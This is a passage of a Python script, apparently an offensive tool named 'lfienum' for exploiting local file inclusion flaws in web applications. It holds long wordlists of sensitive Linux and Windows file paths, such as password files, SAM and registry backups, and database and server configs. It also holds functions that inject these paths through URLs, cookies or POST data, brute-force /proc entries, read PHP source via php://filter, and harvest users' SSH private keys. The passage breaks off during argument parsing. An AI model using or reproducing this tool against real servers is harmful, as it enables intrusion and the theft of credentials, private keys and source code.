'/usr/local/mysql/data/mysql.err',
'/usr/local/mysql/data/mysql.log',
'/usr/local/mysql/data/mysql-bin.index',
'/usr/local/mysql/data/mysql-bin.log',
'/usr/local/mysql/data/mysqlderror.log',
'/usr/local/mysql/data/mysql-slow.log',
'/usr/local/nginx/conf/nginx.conf',
'/usr/local/pgsql/bin/pg_passwd',
'/usr/local/pgsql/data/passwd',
'/usr/local/pgsql/data/pg_hba.conf',
'/usr/local/pgsql/data/pg_log',
'/usr/local/pgsql/data/postgresql.conf',
'/usr/local/pgsql/data/postgresql.log',
'/usr/local/php/apache.conf',
'/usr/local/php/apache.conf.php',
'/usr/local/php/apache2.conf',
'/usr/local/php/apache2.conf.php',
'/usr/local/php/httpd.conf.php',
'/usr/local/php4/apache.conf',
'/usr/local/php4/apache.conf.php',
'/usr/local/php4/apache2.conf',
'/usr/local/php4/apache2.conf.php',
'/usr/local/php5/apache.conf',
'/usr/local/php5/apache.conf.php',
'/usr/local/php5/apache2.conf',
'/usr/local/php5/apache2.conf.php',
'/usr/local/psa/admin/conf/php.ini',
'/usr/local/psa/admin/conf/site_isolation_settings.ini',
'/usr/local/psa/admin/htdocs/domains/databases/phpMyAdmin/libraries/config.default.php',
'/usr/local/psa/admin/logs/httpsd_access_log',
'/usr/local/psa/admin/logs/panel.log',
'/usr/local/pureftpd/etc/pureftpd.pdb',
'/usr/local/samba/lib/log.user',
'/usr/local/samba/lib/smb.conf.user',
'/usr/local/sb/config',
'/usr/local/squirrelmail/www/README',
'/usr/local/zeus/web/global.cfg',
'/usr/local/zeus/web/log/errors',
'/usr/pkg/etc/httpd/httpd.conf',
'/usr/pkg/etc/httpd/httpd-default.conf',
'/usr/pkg/etc/httpd/httpd-vhosts.conf',
'/usr/pkgsrc/net/pureftpd/pure-ftpd.conf',
'/usr/pkgsrc/net/pureftpd/pureftpd.passwd',
'/usr/pkgsrc/net/pureftpd/pureftpd.pdb',
'/usr/ports/contrib/pure-ftpd/pure-ftpd.conf',
'/usr/ports/contrib/pure-ftpd/pureftpd.passwd',
'/usr/ports/contrib/pure-ftpd/pureftpd.pdb',
'/usr/ports/ftp/pure-ftpd/pure-ftpd.conf',
'/usr/ports/ftp/pure-ftpd/pureftpd.passwd',
'/usr/ports/ftp/pure-ftpd/pureftpd.pdb',
'/usr/ports/net/pure-ftpd/pure-ftpd.conf',
'/usr/ports/net/pure-ftpd/pureftpd.passwd',
'/usr/ports/net/pure-ftpd/pureftpd.pdb',
'/usr/sbin/mudlogd',
'/usr/sbin/mudpasswd',
'/usr/share/adduser/adduser.conf',
'/usr/share/logs/catalina.err',
'/usr/share/logs/catalina.out',
'/usr/share/squirrelmail/config/config.php',
'/usr/share/squirrelmail/plugins/squirrel_logger/setup.php',
'/usr/share/tomcat/logs/catalina.err',
'/usr/share/tomcat/logs/catalina.out',
'/usr/share/tomcat6/conf/context.xml',
'/usr/share/tomcat6/conf/logging.properties',
'/usr/share/tomcat6/conf/server.xml',
'/usr/share/tomcat6/conf/workers.properties',
'/usr/share/tomcat6/logs/catalina.err',
'/usr/share/tomcat6/logs/catalina.out',
'/usr/spool/lp/log',
'/usr/spool/mqueue/syslog',
'/var/adm/acct/sum/loginlog',
'/var/adm/aculog',
'/var/adm/aculogs',
'/var/adm/crash/unix',
'/var/adm/crash/vmcore',
'/var/adm/cron/log',
'/var/adm/dtmp',
'/var/adm/lastlog/username',
'/var/adm/log/asppp.log',
'/var/adm/loginlog',
'/var/adm/lp/lpd-errs',
'/var/adm/messages',
'/var/adm/pacct',
'/var/adm/qacct',
'/var/adm/ras/bootlog',
'/var/adm/ras/errlog',
'/var/adm/sulog',
'/var/adm/SYSLOG',
'/var/adm/utmp',
'/var/adm/utmpx',
'/var/adm/vold.log',
'/var/adm/wtmp',
'/var/adm/wtmpx',
'/var/adm/X0msgs',
'/var/apache/conf/httpd.conf',
'/var/cpanel/tomcat.options',
'/var/cron/log',
'/var/data/mysql-bin.index',
'/var/lib/pgsql/data/postgresql.conf',
'/var/lib/squirrelmail/prefs/squirrelmail.log',
'/var/lighttpd.log',
'/var/log/access.log',
'/var/log/access_log',
'/var/log/apache2/squirrelmail.err.log',
'/var/log/apache2/squirrelmail.log',
'/var/log/authlog',
'/var/log/boot.log',
'/var/log/cron/var/log/postgres.log',
'/var/log/daemon.log.1',
'/var/log/data/mysql-bin.index',
'/var/log/error.log',
'/var/log/error_log',
'/var/log/exim/paniclog',
'/var/log/ipfw',
'/var/log/ipfw.log',
'/var/log/ipfw.today',
'/var/log/ipfw/ipfw.log',
'/var/log/kern.log.1',
'/var/log/lighttpd.access.log',
'/var/log/lighttpd.error.log',
'/var/log/lighttpd/',
'/var/log/lighttpd/access.log',
'/var/log/lighttpd/error.log',
'/var/log/lighttpd/access.www.log',
'/var/log/lighttpd/error.www.log',
'/var/log/log.smb',
'/var/log/mail.err',
'/var/log/messages.1',
'/var/log/muddleftpd',
'/var/log/muddleftpd.conf',
'/var/log/mysql.err',
'/var/log/mysql/data/mysql-bin.index',
'/var/log/mysql/mysql-bin.index',
'/var/log/mysql-bin.index',
'/var/log/news.all',
'/var/log/news/news.all',
'/var/log/news/news.crit',
'/var/log/news/news.err',
'/var/log/news/news.notice',
'/var/log/news/suck.err',
'/var/log/news/suck.notice',
'/var/log/nginx.access_log',
'/var/log/nginx.error_log',
'/var/log/nginx/access.log',
'/var/log/nginx/access_log',
'/var/log/nginx/error.log',
'/var/log/nginx/error_log',
'/var/log/pgsql/pgsql.log',
'/var/log/pgsql_log',
'/var/log/pgsql8.log',
'/var/log/pm-powersave.log',
'/var/log/POPlog',
'/var/log/postgres/pg_backup.log',
'/var/log/postgres/postgres.log',
'/var/log/postgresql.log',
'/var/log/postgresql/main.log',
'/var/log/postgresql/postgres.log',
'/var/log/postgresql/postgresql.log',
'/var/log/postgresql/postgresql-8.1-main.log',
'/var/log/postgresql/postgresql-8.3-main.log',
'/var/log/postgresql/postgresql-8.4-main.log',
'/var/log/postgresql/postgresql-9.0-main.log',
'/var/log/postgresql/postgresql-9.1-main.log',
'/var/log/proftpd.access_log',
'/var/log/proftpd.xferlog',
'/var/log/proftpd/xferlog.legacy',
'/var/log/samba.log',
'/var/log/samba.log1',
'/var/log/samba.log2',
'/var/log/samba/log.nmbd',
'/var/log/samba/log.smbd',
'/var/log/squirrelmail.log',
'/var/log/sso/sso.log',
'/var/log/sw-cp-server/error_log',
'/var/log/syslog',
'/var/log/syslog.1',
'/var/log/tomcat6/catalina.out',
'/var/log/ufw.log',
'/var/log/user.log',
'/var/log/user.log.1',
'/var/log/vmware/hostd.log',
'/var/log/vmware/hostd-1.log',
'/var/log/webmin/miniserv.log',
'/var/log/Xorg.0.log',
'/var/logs/access.log',
'/var/lp/logs/lpNet',
'/var/lp/logs/lpsched',
'/var/lp/logs/requests',
'/var/mysql-bin.index',
'/var/nm2/postgresql.conf',
'/var/postgresql/db/postgresql.conf',
'/var/postgresql/log/postgresql.log',
'/var/saf/_log',
'/var/saf/port/log',
'/var/www/.lighttpdpassword',
'/var/www/conf',
'/var/www/conf/httpd.conf',
'/var/www/html/squirrelmail/config/config.php',
'/var/www/html/squirrelmail-1.2.9/config/config.php',
'/var/www/squirrelmail/config/config.php',
'/web/conf/php.ini',
'/www/apache/conf/httpd.conf',
'/www/conf/httpd.conf',
'/www/logs/freebsddiary-access_log',
'/www/logs/freebsddiary-error.log',
'/www/logs/proftpd.system.log']

windows_wordlist=['C:/Users/Administrator/NTUser.dat',
'C:/Documents and Settings/Administrator/NTUser.dat',
'C:/apache/logs/access.log',
'C:/apache/logs/error.log',
'C:/apache/php/php.ini',
'C:/boot.ini',
'C:/inetpub/wwwroot/global.asa',
'C:/MySQL/data/hostname.err',
'C:/MySQL/data/mysql.err',
'C:/MySQL/data/mysql.log',
'C:/MySQL/my.cnf',
'C:/MySQL/my.ini',
'C:/php4/php.ini',
'C:/php5/php.ini',
'C:/php/php.ini',
'C:/Program Files/Apache Group/Apache2/conf/httpd.conf',
'C:/Program Files/Apache Group/Apache/conf/httpd.conf',
'C:/Program Files/Apache Group/Apache/logs/access.log',
'C:/Program Files/Apache Group/Apache/logs/error.log',
'C:/Program Files/FileZilla Server/FileZilla Server.xml',
'C:/Program Files/MySQL/data/hostname.err',
'C:/Program Files/MySQL/data/mysql-bin.log',
'C:/Program Files/MySQL/data/mysql.err',
'C:/Program Files/MySQL/data/mysql.log',
'C:/Program Files/MySQL/my.ini',
'C:/Program Files/MySQL/my.cnf',
'C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err',
'C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log',
'C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err',
'C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log',
'C:/Program Files/MySQL/MySQL Server 5.0/my.cnf',
'C:/Program Files/MySQL/MySQL Server 5.0/my.ini',
'C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf',
'C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf',
'C:/Program Files (x86)/Apache Group/Apache/conf/access.log',
'C:/Program Files (x86)/Apache Group/Apache/conf/error.log',
'C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml',
'C:/Program Files (x86)/xampp/apache/conf/httpd.conf',
'C:/WINDOWS/php.ini',
'C:/WINDOWS/Repair/SAM',
'C:/Windows/repair/system C:/Windows/repair/software',
'C:/Windows/repair/security',
'C:/WINDOWS/System32/drivers/etc/hosts',
'C:/Windows/win.ini',
'C:/WINNT/php.ini',
'C:/WINNT/win.ini',
'C:/xampp/apache/bin/php.ini',
'C:/xampp/apache/logs/access.log',
'C:/xampp/apache/logs/error.log',
'C:/Windows/Panther/Unattend/Unattended.xml',
'C:/Windows/Panther/Unattended.xml',
'C:/Windows/debug/NetSetup.log',
'C:/Windows/system32/config/AppEvent.Evt',
'C:/Windows/system32/config/SecEvent.Evt',
'C:/Windows/system32/config/default.sav',
'C:/Windows/system32/config/security.sav',
'C:/Windows/system32/config/software.sav',
'C:/Windows/system32/config/system.sav',
'C:/Windows/system32/config/regback/default',
'C:/Windows/system32/config/regback/sam',
'C:/Windows/system32/config/regback/security',
'C:/Windows/system32/config/regback/system',
'C:/Windows/system32/config/regback/software',
'C:/Program Files/MySQL/MySQL Server 5.1/my.ini',
'C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml',
'C:/Windows/System32/inetsrv/config/applicationHost.config',
'C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log',
'C:/Program Files/Microsoft SQL Server/MSSQL.1/Template Data/master.mdf',
'C:/Program Files/Microsoft SQL Server/MSSQL10.SQLEXPRESS/Template Data/master.mdf',
'C:/Program Files/Microsoft SQL Server/MSSQL11.SQLEXPRESS/Template Data/master.mdf',
'C:/Program Files/Microsoft SQL Server/MSSQL12.SQLEXPRESS/Template Data/master.mdf',
'C:/Program Files/Microsoft SQL Server/MSSQL13.SQLEXPRESS/Template Data/master.mdf',
'C:/Program Files/Microsoft SQL Server/MSSQL14.SQLEXPRESS/Template Data/master.mdf',
'c:/php5/php.ini',
'c:/php4/php.ini',
'c:/php/php.ini',
'c:/PHP/php.ini',
'c:/WINDOWS/php.ini',
'c:/WINNT/php.ini',
'c:/apache/php/php.ini',
'c:/xampp/apache/bin/php.ini',
'c:/NetServer/bin/stable/apache/php.ini',
'c:/Program Files/MySQL/MySQL Server 5.0/data/{HOST}.err',
'c:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log',
'c:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err',
'c:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log',
'c:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.index',
'c:/Program Files/MySQL/data/{HOST}.err',
'c:/Program Files/MySQL/data/mysql.log',
'c:/Program Files/MySQL/data/mysql.err',
'c:/Program Files/MySQL/data/mysql-bin.log',
'c:/Program Files/MySQL/data/mysql-bin.index',
'c:/MySQL/data/{HOST}.err',
'c:/MySQL/data/mysql.log',
'c:/MySQL/data/mysql.err',
'c:/MySQL/data/mysql-bin.log',
'c:/MySQL/data/mysql-bin.index',
'c:/Program Files/MySQL/MySQL Server 5.0/my.ini',
'c:/Program Files/MySQL/MySQL Server 5.0/my.cnf',
'c:/Program Files/MySQL/my.ini',
'c:/Program Files/MySQL/my.cnf',
'c:/MySQL/my.ini',
'c:/MySQL/my.cnf',
'c:/mysql/bin/my.ini',
'c:/PostgreSQL/log/pgadmin.log',
'c:/var/lib/pgsql/data/postgresql.conf',
'c:/var/postgresql/db/postgresql.conf',
'c:/var/nm2/postgresql.conf',
'c:/usr/local/pgsql/data/postgresql.conf',
'c:/usr/local/pgsql/data/pg_hba.conf',
'c:/usr/internet/pgsql/data/pg_hba.conf',
'c:/usr/local/pgsql/data/passwd',
'c:/usr/local/pgsql/bin/pg_passwd',
'c:/etc/postgresql/postgresql.conf',
'c:/etc/postgresql/pg_hba.conf',
'c:/home/postgres/data/postgresql.conf',
'c:/home/postgres/data/PG_VERSION',
'c:/home/postgres/data/pg_ident.conf',
'c:/home/postgres/data/pg_hba.conf',
'c:/Program Files/PostgreSQL/8.3/data/pg_hba.conf',
'c:/Program Files/PostgreSQL/8.3/data/pg_ident.conf',
'c:/Program Files/PostgreSQL/8.3/data/postgresql.conf',
'c:/Program Files/PostgreSQL/8.4/data/pg_hba.conf',
'c:/Program Files/PostgreSQL/8.4/data/pg_ident.conf',
'c:/Program Files/PostgreSQL/8.4/data/postgresql.conf',
'c:/Program Files/PostgreSQL/9.0/data/pg_hba.conf',
'c:/Program Files/PostgreSQL/9.0/data/pg_ident.conf',
'c:/Program Files/PostgreSQL/9.0/data/postgresql.conf',
'c:/Program Files/PostgreSQL/9.1/data/pg_hba.conf',
'c:/Program Files/PostgreSQL/9.1/data/pg_ident.conf',
'c:/Program Files/PostgreSQL/9.1/data/postgresql.conf',
'c:/wamp/logs/access.log',
'c:/wamp/logs/apache_error.log',
'c:/wamp/logs/genquery.log',
'c:/wamp/logs/mysql.log',
'c:/wamp/logs/slowquery.log',
'c:/wamp/bin/apache/apache2.2.22/logs/access.log',
'c:/wamp/bin/apache/apache2.2.22/logs/error.log',
'c:/wamp/bin/apache/apache2.2.21/logs/access.log',
'c:/wamp/bin/apache/apache2.2.21/logs/error.log',
'c:/wamp/bin/mysql/mysql5.5.24/data/mysql-bin.index',
'c:/wamp/bin/mysql/mysql5.5.16/data/mysql-bin.index',
'c:/wamp/bin/apache/apache2.2.21/conf/httpd.conf',
'c:/wamp/bin/apache/apache2.2.22/conf/httpd.conf',
'c:/wamp/bin/apache/apache2.2.21/wampserver.conf',
'c:/wamp/bin/apache/apache2.2.22/wampserver.conf',
'c:/wamp/bin/apache/apache2.2.22/conf/wampserver.conf',
'c:/wamp/bin/mysql/mysql5.5.24/my.ini',
'c:/wamp/bin/mysql/mysql5.5.24/wampserver.conf',
'c:/wamp/bin/mysql/mysql5.5.16/my.ini',
'c:/wamp/bin/mysql/mysql5.5.16/wampserver.conf',
'c:/wamp/bin/php/php5.3.8/php.ini',
'c:/wamp/bin/php/php5.4.3/php.ini',
'c:/xampp/apache/logs/access.log',
'c:/xampp/apache/logs/error.log',
'c:/xampp/mysql/data/mysql-bin.index',
'c:/xampp/mysql/data/mysql.err',
'c:/xampp/mysql/data/{HOST}.err',
'c:/xampp/sendmail/sendmail.log',
'c:/xampp/apache/conf/httpd.conf',
'c:/xampp/FileZillaFTP/FileZilla Server.xml',
'c:/xampp/MercuryMail/mercury.ini',
'c:/xampp/php/php.ini',
'c:/xampp/phpMyAdmin/config.inc.php',
'c:/xampp/sendmail/sendmail.ini',
'c:/xampp/webalizer/webalizer.conf',
'c:/xampp/htdocs/aca.txt',
'c:/xampp/htdocs/admin.php',
'c:/xampp/htdocs/leer.txt',
'c:/WINNT/system32/logfiles/MSFTPSVC',
'c:/WINNT/system32/logfiles/MSFTPSVC1',
'c:/WINNT/system32/logfiles/MSFTPSVC2',
'c:/WINDOWS/system32/logfiles/MSFTPSVC',
'c:/WINDOWS/system32/logfiles/MSFTPSVC1',
'c:/WINDOWS/system32/logfiles/MSFTPSVC2',
'c:/WINNT/system32/logfiles/SMTPSVC',
'c:/WINNT/system32/logfiles/SMTPSVC1',
'c:/WINNT/system32/logfiles/SMTPSVC2',
'c:/WINNT/system32/logfiles/SMTPSVC3',
'c:/WINNT/system32/logfiles/SMTPSVC4',
'c:/WINNT/system32/logfiles/SMTPSVC5',
'c:/WINDOWS/system32/logfiles/SMTPSVC',
'c:/WINDOWS/system32/logfiles/SMTPSVC1',
'c:/WINDOWS/system32/logfiles/SMTPSVC2',
'c:/WINDOWS/system32/logfiles/SMTPSVC3',
'c:/WINDOWS/system32/logfiles/SMTPSVC4',
'c:/WINDOWS/system32/logfiles/SMTPSVC5',
'c:/WINNT/system32/logfiles/W3SVC/inetsvn1.log',
'c:/WINNT/system32/logfiles/W3SVC1/inetsvn1.log',
'c:/WINNT/system32/logfiles/W3SVC2/inetsvn1.log',
'c:/WINNT/system32/logfiles/W3SVC3/inetsvn1.log',
'c:/WINDOWS/system32/logfiles/W3SVC/inetsvn1.log',
'c:/WINDOWS/system32/logfiles/W3SVC1/inetsvn1.log',
'c:/WINDOWS/system32/logfiles/W3SVC2/inetsvn1.log',
'c:/WINDOWS/system32/logfiles/W3SVC3/inetsvn1.log',
'c:/Program Files/Apache Group/Apache/logs/access.log',
'c:/Program Files/Apache Group/Apache/logs/error.log',
'c:/Program Files/Apache Software Foundation/Apache2.2/logs/error.log',
'c:/Program Files/Apache Software Foundation/Apache2.2/logs/access.log',
'c:/Program Files/Apache Group/Apache/conf/httpd.conf',
'c:/Program Files/Apache Group/Apache2/conf/httpd.conf',
'c:/Program Files/xampp/apache/conf/apache.conf',
'c:/Program Files/xampp/apache/conf/apache2.conf',
'c:/Program Files/xampp/apache/conf/httpd.conf',
'c:/Program Files/Apache Group/Apache/apache.conf',
'c:/Program Files/Apache Group/Apache/conf/apache.conf',
'c:/Program Files/Apache Group/Apache2/conf/apache.conf',
'c:/Program Files/Apache Group/Apache/apache2.conf',
'c:/Program Files/Apache Group/Apache/conf/apache2.conf',
'c:/Program Files/Apache Group/Apache2/conf/apache2.conf',
'c:/Program Files/Apache Software Foundation/Apache2.2/conf/httpd.conf',
'c:/var/log/lighttpd/access.log',
'c:/Program Files/Vidalia Bundle/Polipo/polipo.conf',
'c:/WINNT/system32/logfiles/Firewall/pfirewall.log',
'c:/WINNT/system32/logfiles/Firewall/pfirewall.log.old',
'c:/WINDOWS/system32/logfiles/Firewall/pfirewall.log',
'c:/WINDOWS/system32/logfiles/Firewall/pfirewall.log.old',
'c:/WINDOWS/system32/drivers/etc/hosts',
'c:/WINDOWS/system32/drivers/etc/lmhosts.sam',
'c:/WINDOWS/system32/drivers/etc/networks',
'c:/WINDOWS/system32/drivers/etc/protocol',
'c:/WINDOWS/system32/drivers/etc/services',
'c:/boot.ini',
'c:/WINDOWS/Debug/NetSetup.LOG',
'c:/WINDOWS/comsetup.log',
'c:/WINDOWS/repair/setup.log',
'c:/WINDOWS/setupact.log',
'c:/WINDOWS/setupapi.log',
'c:/WINDOWS/setuperr.log',
'c:/WINDOWS/updspapi.log',
'c:/WINDOWS/wmsetup.log',
'c:/WINDOWS/WindowsUpdate.log',
'c:/WINDOWS/ODBC.INI',
'c:/WINDOWS/system32/Macromed/Flash/FlashInstall.log',
'c:/WINDOWS/system32/Macromed/Flash/install.log']


def Enum(prior_wordlist, later_wordlist):

  for wordlist in prior_wordlist,later_wordlist:
    for possible_lfi_file in wordlist:
      if cookie_mode == True:
        response = request(url, cookies={cookie:possible_lfi_file}, verify=True, headers=headers, allow_redirects=False)
      if data_mode == True:
        response = request(url, data={data:possible_lfi_file}, verify=True, headers=headers, allow_redirects=False)		
      if cookie_mode is None and data_mode is None:		
        response = request(url + possible_lfi_file, verify=True, headers=headers, allow_redirects=False)
      if response.status_code == 200 or response.status_code == 301 or response.status_code == 302:
        content = XCF(response)       			        
        if len(content) > 0 and content != blacklist:
          if cookie_mode == True:
            print (ColGreenMark + "> " + url + ' ' + cookie + '=' + possible_lfi_file + ColEnd)
          if data_mode == True:
            print (ColGreenMark + "> " + url + ' ' + data + '=' + possible_lfi_file + ColEnd)			
          if cookie_mode is None and data_mode is None:				
            print (ColGreenMark + "> " + url + possible_lfi_file + ColEnd)
          if package_status == True:	
            PackageStatus(response, content)	
          if only_url == False:		
            print (content)

  return response

	
def Wordlist():

  with open(wordlist, 'r') as custom_wordlist:
    for possible_lfi_file in custom_wordlist:    
      if cookie_mode == True:
        response = request(url, cookies={cookie:possible_lfi_file.strip()}, verify=True, headers=headers, allow_redirects=False)			
      if data_mode == True:
        response = request(url, data={data:possible_lfi_file.strip()}, verify=True, headers=headers, allow_redirects=False)			
      if cookie_mode is None and data_mode is None:
        response = request(url + possible_lfi_file.strip(), verify=True, headers=headers, allow_redirects=False)
      if response.status_code == 200 or response.status_code == 301 or response.status_code == 302:
        content = XCF(response)
        if len(content) > 0 and content != blacklist:				
          if cookie_mode == True:					
            print (ColGreenMark + "> " + url + ' ' + cookie + '=' + possible_lfi_file.strip() + ColEnd)						
          if data_mode == True:
            print (ColGreenMark + "> " + url + ' ' + data + '=' + possible_lfi_file + ColEnd)				
          if cookie_mode is None and data_mode is None:					
            print (ColGreenMark + "> " + url + possible_lfi_file.strip() + ColEnd)					
          if package_status == True:	
            PackageStatus(response,content)						
          if only_url == False:					
            print (content)

  return response

def PIDS():
  	
  print ("Bruteforcing 0-" + str(pids) + " PIDS\n")
  for pid in range(pids+1):
    if cookie_mode == True:		
      response = request(url, cookies={cookie:'/proc/' + str(pid) + '/cmdline'}, verify=True, headers=headers, allow_redirects=False)		
    if data_mode == True:
      response = request(url, data={data:'/proc/' + str(pid) + '/cmdline'}, verify=True, headers=headers, allow_redirects=False)		
    if cookie_mode is None and data_mode is None:		
      response = request(url + '/proc/' + str(pid) + '/cmdline', verify=True, headers=headers, allow_redirects=False)
    if response.status_code == 200 or response.status_code == 301 or response.status_code == 302:
      content = XCF(response)
      if len(content) > 0 and content != blacklist:
        if only_url == False:
          print (ColGreenMark + "PID " + str(pid) + ":" + ColEnd + " " + content.strip())
        if only_url == True:				
          if cookie_mode == True:					
            print (ColGreenMark + "> " + url + ' ' + cookie + '=/proc/' + str(pid) + '/cmdline' + ColEnd)						
          if data_mode == True:					
            print (ColGreenMark + "> " + url + ' ' + data + '=/proc/' + str(pid) + '/cmdline' + ColEnd)					
          if cookie_mode is None and data_mode is None:					
            print (ColGreenMark + "> " + url + '/proc/' + str(pid) + '/cmdline' + ColEnd)
        if package_status == True:	
          PackageStatus(response, content)

  return response

def PID():

  if cookie_mode == True:		
    response = request(url, cookies={cookie:'/proc/' + str(pid) + '/cmdline'}, verify=True, headers=headers, allow_redirects=False)		
  if data_mode == True:
    response = request(url, data={data:'/proc/' + str(pid) + '/cmdline'}, verify=True, headers=headers, allow_redirects=False)	
  if cookie_mode is None and data_mode is None:		
    response = request(url + '/proc/' + str(pid) + '/cmdline', verify=True, headers=headers, allow_redirects=False)
  if response.status_code == 200 or response.status_code == 301 or response.status_code == 302:
    content = XCF(response)
    if len(content) > 0 and content != blacklist:
      if only_url == False:
        print (ColGreenMark + "PID " + str(pid) + ":" + ColEnd + " " + content.strip())
      if only_url == True:			
        if cookie_mode == True:				
          print (ColGreenMark + "> " + url + ' ' + cookie + '=/proc/' + str(pid) + '/cmdline' + ColEnd)					
        if data_mode == True:				
          print (ColGreenMark + "> " + url + ' ' + data + '=/proc/' + str(pid) + '/cmdline' + ColEnd)									
        if cookie_mode is None and data_mode is None:
          print (ColGreenMark + "> " + url + '/proc/' + str(pid) + '/cmdline' + ColEnd)
      if package_status == True:	
        PackageStatus(response, content)
        
  return response

def FD(fd):

  print ("Bruteforcing 0-" + str(fd) + " /proc/self/fd/X\n")
  for fd in range(fd+1):
    if cookie_mode == True:		
      response = request(url, cookies={cookie:'/proc/self/fd/' + str(fd)}, verify=True, headers=headers, allow_redirects=False)		
    if data_mode == True:
      response = request(url, data={data:'/proc/self/fd/' + str(fd)}, verify=True, headers=headers, allow_redirects=False)		
    if cookie_mode is None and data_mode is None:
      response = request(url + '/proc/self/fd/' + str(fd), verify=True, headers=headers, allow_redirects=False)
    if response.status_code == 200 or response.status_code == 301 or response.status_code == 302:
      content = XCF(response)
      if len(content) > 0 and content != blacklist:		
        if cookie_mode == True:				
          print (ColGreenMark + "> " + url + ' ' + cookie + '=/proc/self/fd/' + str(fd) + ColEnd)					
        if data_mode == True:				
          print (ColGreenMark + "> " + url + ' ' + data + '=/proc/self/fd/' + str(fd) + ColEnd)						
        if cookie_mode is None and data_mode is None:				
          print (ColGreenMark + "> " + url + '/proc/self/fd/' + str(fd) + ColEnd)				
        if package_status == True:	
          PackageStatus(response, content)				
        if only_url == False:				
          print(content)
          
  return response

def Wrapper():

  if cookie_mode == True:	
    response = request(url, cookies={cookie:'php://filter/convert.base64-encode/resource=' + wrapper}, verify=True, headers=headers, allow_redirects=False)		
  if data_mode == True:
    response = request(url, data={data:'php://filter/convert.base64-encode/resource=' + wrapper}, verify=True, headers=headers, allow_redirects=False)	
  if cookie_mode is None and data_mode is None:
    response = request(url + 'php://filter/convert.base64-encode/resource=' + wrapper, verify=True, headers=headers, allow_redirects=False)	
  content = XCF(response)	
  if len(content) > 0 and content != blacklist:		
    if cookie_mode == True:		
      print(ColGreenMark + "> " + url + ' ' + cookie + '=php://filter/convert.base64-encode/resource=' + wrapper + ColEnd)			
    if data_mode == True:		
      print(ColGreenMark + "> " + url + ' ' + data + '=php://filter/convert.base64-encode/resource=' + wrapper + ColEnd)	
    if cookie_mode is None and data_mode is None:		
      print(ColGreenMark + "> " + url + 'php://filter/convert.base64-encode/resource=' + wrapper + ColEnd)		
    if package_status == True:		
      print ('[Response Code]:', response.status_code)
      print ('[Encoded Content Lenght]:', len(content), '\n')
    if only_url == False:
      print (content.strip("\n"))			
      try:
        print("\n" + base64.b64decode(content).decode('utf-8'))	
      except UnicodeDecodeError:	
        print ('\n\n' + ColRedMark + 'Something went wrong while decoding base64. Junk data? Try decoding manually or use other XCF function' + ColEnd + '\n')
        exit(1)
        
  return response
	
def IdRSA():

  if cookie_mode == True:	
    response = request(url, cookies={cookie:'/etc/passwd'}, headers=headers)		
  if data_mode == True:	
    response = request(url, data={data:'/etc/passwd'}, headers=headers)	
  if cookie_mode is None and data_mode is None:			
    response = request(url + '/etc/passwd', headers=headers)	
  for fetch_users in response.text.split('\n'):
    if ':/home/' in fetch_users:		
      if cookie_mode == True:			
        fetch_id_rsa = request(url, cookies={cookie:'/home/' + fetch_users.split(":")[0].strip() + '/.ssh/id_rsa'}, verify=True, headers=headers, allow_redirects=False)				
      if data_mode == True:			
        fetch_id_rsa = request(url, data={data:'/home/' + fetch_users.split(":")[0].strip() + '/.ssh/id_rsa'}, verify=True, headers=headers, allow_redirects=False)			
      if cookie_mode is None and data_mode is None:			
        fetch_id_rsa = request(url + '/home/' + fetch_users.split(":")[0].strip() + '/.ssh/id_rsa', verify=True, headers=headers, allow_redirects=False)
      response = fetch_id_rsa
      if fetch_id_rsa.status_code == 200 or fetch_id_rsa.status_code == 301 or fetch_id_rsa.status_code == 302:
        content = XCF(response)
        if len(content) > 0 and content != blacklist:
          if cookie_mode == True:					
            print (ColGreenMark + '> ' + url + ' ' + cookie + '=/home/' + fetch_users.split(":")[0].strip() + '/.ssh/id_rsa' + ColEnd)						
          if data_mode == True:					
            print (ColGreenMark + '> ' + url + ' ' + data + '=/home/' + fetch_users.split(":")[0].strip() + '/.ssh/id_rsa' + ColEnd)						
          if cookie_mode is None and data_mode is None:					
            print (ColGreenMark + '> ' + url + '/home/' + fetch_users.split(":")[0].strip() + '/.ssh/id_rsa' + ColEnd)					
          if only_url == False:						
            print (ColYellowMark + '> ' + fetch_users.split(":")[0].strip() + ' id_rsa private key' + ColEnd)					
          if package_status == True:	
            PackageStatus(response, content)
          if only_url == False:					
            print (content)
            
  return response

request = requests.get						
cookie_mode = None
data_mode = None
wordlist = None
pid = None
pids = None
wrapper = None
key = None
fd = None
blacklist = None

def Main():
	
  arguments_list = []
  for arg in sys.argv:
    arguments_list.append(arg)
  for argument in arguments_list:  
    if argument == '-w' or argument == '--wordlist':
      global wordlist
      n = arguments_list.index(argument)+1
      wordlist = arguments_list[n]
    if argument == '-X':
      global request
      n = arguments_list.index(argument)+1
      try:
        method = arguments_list[n]
        if method.casefold() == 'POST'.casefold():
          request = requests.post
        elif method.casefold() == 'GET'.casefold():
          request = requests.get
      except IndexError:
        print ("method usage example:")
        print ("python3 lfienum http://ghost.server/index.php -X POST --data-mode file")
        exit(1)
    if argument == '--pid':
      global pid
      n = arguments_list.index(argument)+1
      try:
        pid = int(arguments_list[n])
      except (IndexError,ValueError):
        print ("single pid usage:")
        print ('python3 lfienum "http://ghost.server/index.php?page=" --pid 1')
        exit(1)
    if argument == '--pids':
      global pids
      n = arguments_list.index(argument)+1
      try:
        pids = int(arguments_list[n])
      except IndexError:
        pids = 999
      except ValueError:
        print ("bruteforce pids usage:")
        print ('python3 lfienum "http://ghost.server/index.php?page=" --pids 500')
        exit(1)		
    if argument == '--wrapper':
      global wrapper
      n = arguments_list.index(argument)+1
      try:
        wrapper = arguments_list[n]	
      except IndexError:
        print ("wrapper argument usage example:")
        print ("python3 lfienum http://ghost.server/index.php?page= --wrapper index.php")
        exit(1)		
    if argument == '-k' or argument == '--key':
      global key
      key = True
    if argument == '--fd':
      global fd
      n = arguments_list.index(argument)+1
      try:
        fd = int(arguments_list[n])
      except IndexError:
        fd = 30
      except ValueError:
        print ("bruteforce fd usage:")
